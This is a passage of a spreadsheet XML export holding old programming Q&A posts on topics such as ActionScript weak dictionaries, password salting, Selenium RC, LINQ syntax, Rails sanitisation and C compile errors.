&lt;p&gt;Edit2: I tried testing what Aaron said, and came up with just weird stuff... just iterating the dictionary (without doing anything) changes the behaviour:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var mc = new MovieClip();
var dic = new Dictionary(true);
dic[mc] = 12;
addChild(mc);
removeChild(mc);
mc = null;
for (var objeto in dic) {}    // &amp;lt;-- try commenting out this line
addEventListener('enterFrame', f);  // I print the contents every frame, to see if
                                    // it gets removed after awhile
function f(evento)
{
    System.gc();
    System.gc();
    for (var objeto in dic)
        trace(objeto);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This keeps printing [object Movieclip] every frame, unless I comment out the indicated line, where it doesn't print anything.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The necessity of hiding the salt for a hash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At work we have two competing theories for salts.  The products I work on use something like a user name or phone number to salt the hash.  Essentially something that is different for each user but is readily available to us.  The other product randomly generates a salt for each user and changes each time the user changes the password.  The salt is then encrypted in the database.&lt;/p&gt;
&lt;p&gt;My question is if the second approach is really necessary?  I can understand from a purely theoretical perspective that it is more secure than the first approach, but what about from a practicality point of view.  Right now to authenticate a user, the salt must be unencrypted and applied to the login information.  &lt;/p&gt;
&lt;p&gt;After thinking about it, I just don't see a real security gain from this approach.  Changing the salt from account to account, still makes it extremely difficult for someone to attempt to brute force the hashing algorithm even if the attacker was aware of how to quickly determine what it was for each account.  This is going on the assumption that the  passwords are sufficiently strong.  (Obviously finding the correct hash for a set of passwords where they are all two digits is significantly easier than finding the correct hash of passwords which are 8 digits).  Am I incorrect in my logic, or is there something that I am missing?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Okay so here's the reason why I think it's really moot to encrypt the salt.  (lemme know if I'm on the right track).  &lt;/p&gt;
&lt;p&gt;For the following explanation, we'll assume that the passwords are always 8 characters and the salt is 5 and all passwords are comprised of lowercase letters (it just makes the math easier).&lt;/p&gt;
&lt;p&gt;Having a different salt for each entry means that I can't use the same rainbow table (actually technically I could if I had one of sufficient size, but let's ignore that for the moment).  This is the real key to the salt from what I understand, because to crack every account I have to reinvent the wheel so to speak for each one.  Now if I know how to apply the correct salt to a password to generate the hash, I'd do it because a salt really just extends the length/complexity of the hashed phrase.  So I would be cutting the number of possible combinations I would need to generate to "know" I have the password + salt from 13^26 to 8^26 because I know what the salt is.  Now that makes it easier, but still really hard.  &lt;/p&gt;
&lt;p&gt;So onto encrypting the salt.  If I know the salt is encrypted, I wouldn't try and decrypt (assuming I know it has a sufficient level of encryption) it first.  I would ignore it.  Instead of trying to figure out how to decrypt it, going back to the previous example I would just generate a larger rainbow table containing all keys for the 13^26.  Not knowing the salt would definitely slow me down, but I don't think it would add the monumental task of trying to crack the salt encryption first.  That's why I don't think it's worth it.  Thoughts?&lt;/p&gt;
&lt;p&gt;Here is a link describing how long passwords will hold up under a brute force attack:
&lt;a href="http://www.lockdown.co.uk/?pg=combi"&gt;http://www.lockdown.co.uk/?pg=combi&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Selenium RC: Run tests in multiple browsers automatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I've started to create some Ruby unit tests that use &lt;a href="http://selenium-rc.openqa.org/" rel="nofollow"&gt;Selenium RC&lt;/a&gt; to test my web app directly in the browser.  I'm using the &lt;a href="http://github.com/ph7/selenium-client/tree/master" rel="nofollow"&gt;Selenum-Client&lt;/a&gt; for ruby.  I've created a base class for all my other selenium tests to inherit from.&lt;/p&gt;
&lt;p&gt;This creates numerous SeleniumDriver instances and all the methods that are missing are called on each instance.  This essentially runs the tests in parallel.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How have other people automated this?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is my implementation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class SeleniumTest &amp;lt; Test::Unit::TestCase
  def setup
    @seleniums = %w(*firefox *iexplore).map do |browser|
      puts 'creating browser ' + browser
      Selenium::SeleniumDriver.new("localhost", 4444, browser, "http://localhost:3003", 10000)
    end
    start
    open start_address
  end
  def teardown
      stop
  end
  #sub-classes should override this if they want to change it
  def start_address
    "http://localhost:3003/"
  end
  # Overrides standard "open" method
  def open(addr)
    method_missing 'open', addr
  end
  # Overrides standard "type" method
  def type(inputLocator, value)
    method_missing 'type', inputLocator, value
  end
  # Overrides standard "select" method
  def select(inputLocator, optionLocator)
    method_missing 'select', inputLocator, optionLocator
  end
  def method_missing(method_name, *args)
    @seleniums.each do |selenium_driver|
      if args.empty?
        selenium_driver.send method_name
      else
        selenium_driver.send method_name, *args
      end
    end
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works, but if one browser fails, the whole test fails and there is no way to know which browser it failed on.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Boost like libraries in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you recommend peer reviewed libraries that I can use in C environment (something like Boost for C++) ? Something that provides hash, thread, interprocess communications, lists, smart memory management...&lt;/p&gt;
&lt;p&gt;The environment is embedded system, not a very minimal system, but also not a PC!&lt;/p&gt;
&lt;p&gt;Thanks! 
Amit&lt;/p&gt;
</t>
  </si>
  <si>
    <t>bring a console window to front in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I bring a console application window to front in C# (especially when running the Visual Studio debugger)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where do I plug in into WCF to be notified when a message arrives?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a sample console service host and I want to plug into WCF stack to be able to print a message to console when new message arrives, even if it won't get processed by the service at the moment (because service is working on previous calls).
This is based on my assumption that messages arriving get queued by the WCF, is that correct?&lt;/p&gt;
&lt;p&gt;Additionally, I'm using netTcpBinding if this is important. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple rows with jcarousel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use jcarousel to build a container with multiple rows, I've tried a few things but have had no luck. Can anyone make any suggestions on how to create it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Gradient colors in Internet Explorer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that Internet Explorer has some proprietary extensions so that you can do things like create divs with a gradient background.  I can't remember the element name or it's usage.  Does anyone have some examples or links?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SVN: Dealing with "dead" files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an SVN repository. Over time, as I edit, modify, change, etc, some files are made redundant/unwanted.&lt;/p&gt;
&lt;p&gt;What's the best practice: to delete the files from SVN, or just to zero the files out?
Or is there a third option that I'm missing? &lt;/p&gt;
&lt;p&gt;Thanks. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>A good Code snippet tool or plugin for Word documents?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a good tool or plugin that enables Microsoft Word or OpenOffice Writer to add code snippets to a document in a clean manner? &lt;/p&gt;
&lt;p&gt;I'm not sure if such a plug-in even exists, so redirecting me to any other tool that can help me would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"error: 'struct udphdr' has no member named 'source'" ... huh?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to compile a program called ngrep, and when I ran configure, things seemed to go well, but when I run make, I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ngrep.c: In function â€˜processâ€™:
ngrep.c:544: error: â€˜struct udphdrâ€™ has no member named â€˜sourceâ€™
ngrep.c:545: error: â€˜struct udphdrâ€™ has no member named â€˜destâ€™
make: *** [ngrep.o] Error 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What does that mean, and how do I fix it? There are no earlier warnings or errors that suggest the root of the problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using XQuery in Linq To SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a table that has a column of XML type data.  Within SQL, I can execute the following statement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select   top 10  *,
         Content.value('(/root/item/value)[1]', 'float') as Value
from     xmltabletest
where    Content.value('(/root/item/MessageType)[1]', 'int') = 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The result set contains only the records matching the criteria, and it extracts a value from the XML into a column called 'Value'.  Nice and simple.&lt;/p&gt;
&lt;p&gt;Can the same thing be achieved with Linq To SQL?&lt;/p&gt;
&lt;p&gt;I'd like to get SQL to do the heavy lifting and only return data matching my criteria rather than having to select, transfer, and then process a potentially massive chunk of data. As far as I can tell this isn't possible at the moment, but I thought I should ask.&lt;/p&gt;
&lt;p&gt;(The environment is .NET 3.5, VS2008, SQL Server 2005 if that helps)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XHTML: &lt;a&gt; tag to multiple destinations in multiple target frames?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a table of links within a site using iframes. I'm wondering if there's any way to code a link to go to two simultaneous destinations within two different target frames? I've been reading all afternoon and can't find anything close to what I want to do. Basically I want one link to present a photo in one iframe and some data in another iframe. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How "self-documenting" can code be without being annoying?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not sure what the best practices are here, but I often see abbreviated variable names especially when the scope is small. So (to use simple Ruby examples) instead of &lt;code&gt;def add_location(name, coordinates)&lt;/code&gt;, I see things like &lt;code&gt;def add_loc(name, coord)&lt;/code&gt;â€”and I might even see something like &lt;code&gt;def add_loc(n, x, y)&lt;/code&gt;. &lt;em&gt;I imagine that longer names might tire a person out whose used to seeing abbreviations.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Does verbosity help readability, or does it just hurt everyone's eyes?â€”Do people prefer abbreviations and shortened names over longer names?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RadioButtonList exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After I upgraded to the beta, I'm having trouble with Html.RadioButtonList.  Can someone show me what I'm doing wrong?&lt;/p&gt;
&lt;p&gt;The code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% Html.RadioButtonList(
    "voter" + voter.Id,
    new SelectList(new[]{"yes","no","abstain"}, "yes")).Each(x =&amp;gt; Response.Write(x)); %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the exception I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ArgumentNullException: Value cannot be null.
Parameter name: value]
   System.Web.Mvc.Html.InputExtensions.RadioButton(HtmlHelper htmlHelper, String name, Object value, Boolean isChecked, IDictionary`2 htmlAttributes) +214
   Microsoft.Web.Mvc.&amp;lt;&amp;gt;c__DisplayClass1.&amp;lt;RadioButtonListInternal&amp;gt;b__0(ListItem item) in c:\dd\Cicero\src\Mvc\main\src\MvcFutures\Mvc\RadioExtensions.cs:86
   System.Linq.WhereSelectListIterator`2.MoveNext() +107
   System.Linq.Buffer`1..ctor(IEnumerable`1 source) +259
   System.Linq.Enumerable.ToArray(IEnumerable`1 source) +81
   Microsoft.Web.Mvc.RadioListExtensions.RadioButtonListInternal(HtmlHelper htmlHelper, String name, SelectList selectList, Boolean usedViewData, IDictionary`2 htmlAttributes) in c:\dd\Cicero\src\Mvc\main\src\MvcFutures\Mvc\RadioExtensions.cs:88
   Microsoft.Web.Mvc.RadioListExtensions.RadioButtonList(HtmlHelper htmlHelper, String name, SelectList selectList) in c:\dd\Cicero\src\Mvc\main\src\MvcFutures\Mvc\RadioExtensions.cs:29
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Many thanks in advance!&lt;br /&gt;
Rob &lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;iostream&gt; vs. &lt;iostream.h&gt; vs. "iostream.h"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When including a header file in C++, what's the difference between...&lt;/p&gt;
&lt;p&gt;1) including the .h versus not including the .h when wrapping it in &amp;lt; &gt; signs?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt; vs. #include &amp;lt;iostream.h&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;2) wrapping the header name in double quotes versus wrapping it in &amp;lt; &gt; signs? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream.h&amp;gt; vs. #include "iostream.h"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using trellis as a framework for managing UI interaction rules</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have experience with &lt;a href="http://pypi.python.org/pypi/Trellis" rel="nofollow"&gt;trellis&lt;/a&gt;?  Looking at it as a framework for defining rules for field interaction and validation in grids and data entry screens.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ - Fluent and Query Expression - Is there any benefit(s) of one over other?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;LINQ is one of the greatest improvements to .NET since generics and it saves me tons of time, and lines of code.  However, the fluent syntax seems to come much more natural to me than the query expression syntax.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var title = entries.Where(e =&amp;gt; e.Approved)
    .OrderBy(e =&amp;gt; e.Rating).Select(e =&amp;gt; e.Title)
    .FirstOrDefault();
var query = (from e in entries
             where e.Approved
             orderby e.Rating
             select e.Title).FirstOrDefault();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any difference between the two or is there any particular benefit of one over other?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing Atom &amp; RSS in Ruby/Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something that will let me parse Atom and RSS in Ruby and Rails. I've looked at the standard RSS library, but is there one library that will auto-detect whatever type of feed it is and parse it for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Visual Studio, my Design view doesn't load the master page controls. Why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's just so much &lt;code&gt;HRESULT E_FAIL&lt;/code&gt;, if you know what I'm talking about.  &lt;/p&gt;
&lt;p&gt;And if you use Visual Studio, you know what I'm talking about.&lt;/p&gt;
&lt;p&gt;Similar thread, but not a duplicate: &lt;a href="http://stackoverflow.com/questions/196001/is-the-design-view-for-aspx-pages-in-visual-studio-useful"&gt;Is the design view for aspx pages in Visual Studio useful?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any insight, including input from Microsoft MVPs (oh, I know you're out there) would be super cool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does a pointer change itself during function transition?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the following case I'm calling a &lt;code&gt;Func&lt;/code&gt; with pointer passed to it, but in the called function, the parameter shows the pointer value as something totally bogus. Something like below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool flag = Func(pfspara);--&amp;gt; pfspara = 0x0091d910 
bool Func(PFSPARA pfspara) --&amp;gt; pfspara = 0x00000005
{
    return false;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does &lt;code&gt;pfspara&lt;/code&gt; change to some bogus pointer? I can't reproduce the problem in debug, only in production.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby gem testing before deployment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a gem which has&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;several scripts in the bin directory&lt;/li&gt;
&lt;li&gt;the utility classes in the lib directory&lt;/li&gt;
&lt;li&gt;and several tests in the test directory&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
supertool
 bin
   toolA
   toolB
 lib
   supertool
     supertool.rb
     helper.rb
 test
   tc_main.rb
   tc_etc.rb
&lt;/pre&gt;
&lt;p&gt;Now, to run the tests before I even install the gem, I have the following snippet at the top of my tests:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;base = File.basename(Dir.pwd)
if base == 'test' || base =~ /supertool/
   Dir.chdir('..') if base == 'test'
   $LOAD_PATH.unshift(Dir.pwd + '/lib')
   Dir.chdir('test') if base =~ /supertool/
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems tedious though, especially if I have to put these in the scripts in the bin directory too. Is there a better way of setting up the environment so we can test gems before they are installed? I'm sure it's something simple that I just can't find. A simple link to the right place would help a lot :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sanitize output in Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best solution to sanitize output HTML in Rails (to avoid XSS attacks)?&lt;/p&gt;
&lt;p&gt;I have two options: white_list plugin or sanitize method from Sanitize Helper &lt;a href="http://api.rubyonrails.com/classes/ActionView/Helpers/SanitizeHelper.html" rel="nofollow"&gt;http://api.rubyonrails.com/classes/ActionView/Helpers/SanitizeHelper.html&lt;/a&gt; . For me until today the white_list plugin worked better and in the past, Sanitize was very buggy, but as part of the Core, probably it will be under development and be supported for a while.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternatives to Toad</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using &lt;a href="http://www.toadsoft.com/"&gt;Toad&lt;/a&gt; for my day-to-day work on our databases (queries, updates, small scripts, browsing of db objects, etc.).&lt;/p&gt;
&lt;p&gt;My question is: since my version of Toad is old and buggy, which are the (possibly free, but not necessarily) alternatives to Toad?&lt;/p&gt;
&lt;p&gt;The database versions we are using are 10g and 9i.&lt;/p&gt;
&lt;p&gt;Thanks a lot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# : Characters do not display well when in Console, why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The picture below explains all:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img133.imageshack.us/img133/4206/accentar9.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;The variable textInput comes from &lt;code&gt;File.ReadAllText(path);&lt;/code&gt; and characters like : ' Ã© Ã¨ ... do not display. When I run my UnitTest, all is fine! I see them... Why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scatter Plots in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to graph scatter plots in C++? &lt;/p&gt;
&lt;p&gt;Do you write data to a file and use another tool? Is there a library like matplotlib in Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSON call + .net works in debug mode on inbuilt web server but not by going to virtual dir directly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following javascript:&lt;/p&gt;
&lt;p&gt;$.ajax({ &lt;BR&gt;
        type: "POST", &lt;BR&gt;
        dataType: "json",&lt;BR&gt;
        url: "/Home/Submit",&lt;BR&gt;
        data: { email: strEmail, message: strMessage },&lt;BR&gt;
        success: function(result) &lt;BR&gt;
        {&lt;BR&gt;
            //alert('here');&lt;BR&gt;
            alert(result.message);&lt;BR&gt;
        },&lt;BR&gt;
        error: function(error) {&lt;BR&gt;
            alert(error);&lt;BR&gt;
        }&lt;BR&gt;
    });&lt;BR&gt;
&lt;BR&gt;
This makes a call to this function:&lt;BR&gt;
&lt;BR&gt;
  public JsonResult Submit(string Email, string Message)&lt;BR&gt;
        {&lt;BR&gt;
&lt;BR&gt;
            return  Json(new {message="yep"});&lt;BR&gt;
        }&lt;BR&gt;&lt;/p&gt;
&lt;p&gt;This works fine in debug mode on the inbuilt webserver.&lt;/p&gt;
&lt;p&gt;However if I go to the virtual dir directly it does not and hits the error bit. I attached to the process and the code behind never gets hit. &lt;/p&gt;
&lt;p&gt;I am using Vista. &lt;/p&gt;
&lt;p&gt;Additionally how do you get the error description in the bit where it says  alert(error);&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Alex&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Available iPhone Web Application JavaScript UI Library/Frameworks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting a web application that will target Mobile Safari on iPhone/iPod Touch.  I'm evaluating the available client-side JavaScript/CSS libraries/frameworks that are currently out there.&lt;/p&gt;
&lt;p&gt;These are the ones I'm currenlty aware of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://code.google.com/p/iui/"&gt;iUI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://code.google.com/p/ciui-dev"&gt;CiUI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://code.google.com/p/iphone-universal/"&gt;UiUIKit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://webapp.net.free.fr/"&gt;WebApp.Net&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://snippetspace.com/projects/iwebkit/"&gt;iWebKit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://developer.apple.com/documentation/AppleApplications/Conceptual/Dashcode_UserGuide/Contents/Resources/en.lproj/Introduction/chapter_1_section_1.html"&gt;Apple's Dashcode Application&lt;/a&gt; - not really a standalone library/framework, but it provides/generates JavaScript, CSS, and images that conform to the native iPhone UI metaphors.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Are there any others out there?  I want to make sure I'm not missing any before I make a decision.  I'm only looking for client-side JavaScript/CSS solutions and building one from scratch isn't an option because of time constraints.  No server-side PHP, Ruby, Python, Java, etc. solutions.&lt;/p&gt;
&lt;p&gt;I am aware of the &lt;a href="http://stackoverflow.com/questions/8756/iphone-web-applications-templates-frameworks"&gt;iPhone web applications, templates, frameworks?&lt;/a&gt; question that was asked, but this only mentioned iUI and UiUIKit.&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What type for an integer of more than 4 bytes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to use unsigned integers that could span to more than 4 bytes, what type should I use?&lt;/p&gt;
&lt;p&gt;PS Sorry for the "noobism" but that's it :D&lt;/p&gt;
&lt;p&gt;NB: I need integers because i have to do divisions and care only for the integer parts and this way int are useful&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Coding Guideline 102</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you were allowed to add another coding guideline to the 101 guidelines of the &lt;a href="http://www.gotw.ca/publications/c++cs.htm"&gt;"C++ coding standards" (Herb Sutter and Andrei Alexandrescu)&lt;/a&gt;, which would you add?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between a parent and a reference property in Google App Engine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From what I understand, the parent attribute of a db.Model (typically defined/passed in the constructor call) allows you to define hierarchies in your data models. As a result, this increases the size of the entity group. However, it's not very clear to me why we would want to do that. Is this strictly for ACID compliance? I would like to see scenarios where each is best suited or more appropriate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to load text of MS Word document in C# (.NET)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I load MS Word document (.doc and .docx) to memory (variable) without doing this?:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;wordApp.Documents.Open&lt;/em&gt; &lt;/p&gt;
&lt;p&gt;I don't want to open MS Word, I just want that text inside. &lt;/p&gt;
&lt;p&gt;You gave me answer for DOCX, but what about DOC? I want free and high performance solution - not to open 12.000 instances of Word to process all of them. :( Aspose is commercial product, and 900$ is a way too much for what I do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can record field updates in OCaml be generalized?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a very novice OCaml programmer so please forgive me if this is a stupid/obvious question.  There's &lt;em&gt;a lot&lt;/em&gt; to absorb and I may have missed this in the documentation.&lt;/p&gt;
&lt;p&gt;I have a base of code that's starting to look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let update_x p x =
  add_delta p;
  p.x &amp;lt;- x;
  refresh p
let update_y p y =
  add_delta p;
  p.y &amp;lt;- y;
  refresh p
let update_z p z =
  add_delta p;
  p.z &amp;lt;- z;
  refresh p
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The duplication is starting to bug me because I &lt;em&gt;want&lt;/em&gt; to write something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let update_scalar p scalar value =
    add_delta p;
    magic_reflection (p, scalar) &amp;lt;- value;
    refresh p
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This way when I update x I can simply call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;update_scalar p 'x' value
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This calls out "macros!" to me but I don't believe OCaml has a macro system.  What else can I do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing and configuring a barebones email server on Ubuntu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got an unmanaged Linux VPS running ubuntu that I'm using for the web server for a personal website.  I'd like to get a barebones email server up and running.  All the installation guides I've found so far are for a full-fledged email server with a webmail interface and everything.  That's a lot more than I need.  There's only two things I need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;My web application needs to be able to send email.  Specifically, it'll be emailing me when an exception occurs.&lt;/li&gt;
&lt;li&gt;I want all email sent to [anything]@domain.com forwarded to my personal gmail account.  The server doesn't even need to retain the email or anything.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I want to reserve resources for the actual web app, so I don't want to install anything I won't need for this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a temporary file with Cocoa?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Years ago when I was working with C# I could easily create a temporary file and get its name with this function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Path.GetTempFileName();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function would create a file with a unique name in the temporary directory and return the full path to that file. &lt;/p&gt;
&lt;p&gt;In the Cocoa API's, the closest thing I can find is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSTemporaryDirectory
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Am I missing something obvious or is there no built in way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>gcc error: wrong ELF class: ELFCLASS64</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to compile a program using an external compiled object coreset.o.  I wrote the public01.c test file and my functions are in computation.c, both of which compiles.  However its failing on linking it together.  What might be the problem?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gcc -o public01.x public01.o computation.o coreset.o
ld: fatal: file coreset.o: wrong ELF class: ELFCLASS64
ld: fatal: File processing errors. No output written to public01.x
collect2: ld returned 1 exit status
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the best method of getting the key of the last added array item in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a better way to do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$array = array('test1', 'test2', 'test3', 'test4', 'test5');
// do a bunch of other stuff, probably a loop
$array[] = 'test6';
end($array);
echo key($array); // gives me 6
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will give the key of the most recently add array element.&lt;/p&gt;
&lt;p&gt;Is there a better way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AJAX.Request POST body not send</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a POST request, unfortunately the body of the POST never seems to be sent.&lt;/p&gt;
&lt;p&gt;Below is the code that I'm using.  The code is invoked when a user clicks on a link, not a form "submit" button.  It runs without error, invokes the servlet that is being called but, as I mentioned earlier, the body of the POST never seems to be sent.&lt;/p&gt;
&lt;p&gt;I can validate that the request body is never sent since I have access to the servlet being called.&lt;/p&gt;
&lt;p&gt;I've tried using "parameters" in replace of "requestBody."  I've also tried using a parameter string (x=a?y=b).  I've also validated that "ckULK" does contain a valid value.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Ajax.Request(sURL,
{
    method: 'POST'
    , contentType: "text/x-json"
    , requestBody: {ulk:ckULK}
    , onFailure:
        function(transport)
        {
            vJSONResp = transport.responseText;
            var JSON = eval( "(" + vJSONResp + ")" );
            updateStatus(JSON.code + ": " + JSON.message);
        } // End onFailure
    , onSuccess: 
        function(transport) 
        {
            if (200 == transport.status)
            {
                vJSONResp = transport.responseText;
            }
            else
            {
                log.value += "\n" + transport.status;
            }
         } // End onSuccess
}); // End Ajax.request
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Searching for file dependency for nunit unit testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had a winforms C# class that internally was looking up a file.. to help unit test, i changed it to pass in a file from the outside such as:&lt;/p&gt;
&lt;p&gt;string file = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location + "TestXML.xml");&lt;/p&gt;
&lt;p&gt;Foo = new Foo(file);&lt;/p&gt;
&lt;p&gt;the problem is that the code works fine normally but when run in Nunit it comes us with an error saying "Cant find directory C:\doc &amp;amp; settings\  . . .. testxml.xml&lt;/p&gt;
&lt;p&gt;any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool for Viewing X.509 Certificates?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of any good tools to view the store name, store location, or values of an X.509 Certificate?&lt;/p&gt;
</t>
  </si>
  <si>
